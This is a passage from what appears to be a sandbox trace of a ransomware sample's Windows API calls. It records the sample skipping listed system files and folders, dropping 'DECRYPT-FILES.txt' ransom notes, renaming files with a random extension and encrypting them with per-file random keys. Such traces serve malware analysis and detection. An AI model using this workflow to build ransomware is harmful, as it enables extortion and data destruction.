lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0076.801] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0076.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0076.801] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0076.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0076.801] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0076.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0076.801] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0076.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0076.801] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0076.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0076.801] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0076.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0076.801] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0076.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0076.801] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0076.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0076.801] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0076.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0076.801] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0076.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0076.801] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0076.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0076.801] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0076.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0076.801] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0076.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0076.801] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0076.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0076.801] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0076.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0076.801] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0076.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0076.801] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0076.802] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0076.802] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0076.802] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0076.802] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0076.802] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0076.802] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0076.802] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0076.802] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0076.802] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0076.802] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0076.802] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0076.802] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0076.802] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js") returned 93 [0076.802] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js.9iJazm") returned 100 [0076.802] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js.9iJazm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js.9ijazm"), dwFlags=0x0) returned 1 [0076.803] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.803] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.804] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.804] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9f6fa20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9f6fa20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f6fa20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0076.804] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0076.804] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0076.804] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0076.804] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0076.804] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0076.804] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0076.804] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0076.804] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0076.804] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0076.804] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0076.804] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.804] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0076.804] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0076.804] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0076.804] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0076.804] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\") returned 77 [0076.804] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.804] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\" [0076.804] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\jkbimi8.tmp" [0076.804] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.805] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0076.805] CloseHandle (hObject=0x0) returned 0 [0076.805] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.805] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9f6fa20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9f6fa20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f6fa20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0076.805] FindClose (in: hFindFile=0x5f8d58 | out: hFindFile=0x5f8d58) returned 1 [0076.805] CloseHandle (hObject=0x458) returned 1 [0076.805] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9f498c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9f498c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f498c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0076.805] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0076.805] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0076.805] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0076.805] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0076.805] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0076.805] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0076.806] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0076.806] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0076.806] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0076.806] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0076.806] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.806] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0076.806] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0076.806] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0076.806] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0076.806] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\") returned 65 [0076.806] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.806] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\" [0076.806] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\jkbimi8.tmp" [0076.806] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.806] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0076.806] CloseHandle (hObject=0x0) returned 0 [0076.806] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.806] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda28e240, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xda8cdc00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xda8cdc00, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Security", cAlternateFileName="")) returned 1 [0076.807] lstrcmpW (lpString1="Security", lpString2=".") returned 1 [0076.807] lstrcmpW (lpString1="Security", lpString2="..") returned 1 [0076.807] lstrcatW (in: lpString1="Security", lpString2="\\" | out: lpString1="Security\\") returned="Security\\" [0076.807] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpString2="Security\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\" [0076.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpSrch="\\Program Files") returned 0x0 [0076.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpSrch=":\\Windows") returned 0x0 [0076.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpSrch="\\Games\\") returned 0x0 [0076.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpSrch="\\Tor Browser\\") returned 0x0 [0076.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpSrch="\\ProgramData\\") returned 0x0 [0076.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0076.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0076.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0076.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpSrch="\\All Users") returned 0x0 [0076.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpSrch="\\IETldCache\\") returned 0x0 [0076.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpSrch="\\Local Settings\\") returned 0x0 [0076.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpSrch="\\AppData\\Local") returned 0x0 [0076.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpSrch="AhnLab") returned 0x0 [0076.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0076.807] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\") returned 74 [0076.807] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.807] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\\\jkbimi8.tmp") returned 86 [0076.807] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x458 [0076.807] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\") returned 74 [0076.808] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0076.808] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\\\DECRYPT-FILES.txt") returned 92 [0076.808] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0076.809] WriteFile (in: hFile=0x45c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0076.810] CloseHandle (hObject=0x45c) returned 1 [0076.810] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\") returned 74 [0076.810] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*" [0076.810] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda28e240, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xa9fbbce0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9fbbce0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0076.810] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.810] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda28e240, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xa9fbbce0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9fbbce0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.811] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.811] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.811] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xda8cdc00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xda8cdc00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xda8f3d60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x1517, dwReserved0=0x0, dwReserved1=0x0, cFileName="addressbook.acrodata", cAlternateFileName="ADDRES~1.ACR")) returned 1 [0076.811] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="DECRYPT-FILES.txt") returned -1 [0076.811] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="autorun.inf") returned -1 [0076.811] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="boot.ini") returned -1 [0076.811] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="desktop.ini") returned -1 [0076.811] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="ntuser.dat") returned -1 [0076.811] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="iconcache.db") returned -1 [0076.811] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="bootsect.bak") returned -1 [0076.811] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="ntuser.dat.log") returned -1 [0076.811] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="thumbs.db") returned -1 [0076.811] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="Bootfont.bin") returned -1 [0076.811] lstrlenW (lpString="addressbook.acrodata") returned 20 [0076.811] lstrcmpiW (lpString1="acrodata", lpString2="lnk") returned -1 [0076.811] lstrcmpiW (lpString1="acrodata", lpString2="exe") returned -1 [0076.811] lstrcmpiW (lpString1="acrodata", lpString2="sys") returned -1 [0076.811] lstrcmpiW (lpString1="acrodata", lpString2="dll") returned -1 [0076.811] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\") returned 74 [0076.811] lstrlenW (lpString="addressbook.acrodata") returned 20 [0076.811] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\" [0076.811] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpString2="addressbook.acrodata" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata" [0076.811] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.812] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0076.812] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=5399) returned 1 [0076.812] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0076.813] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0076.814] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0076.814] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0076.814] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0076.817] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0076.817] VirtualAlloc 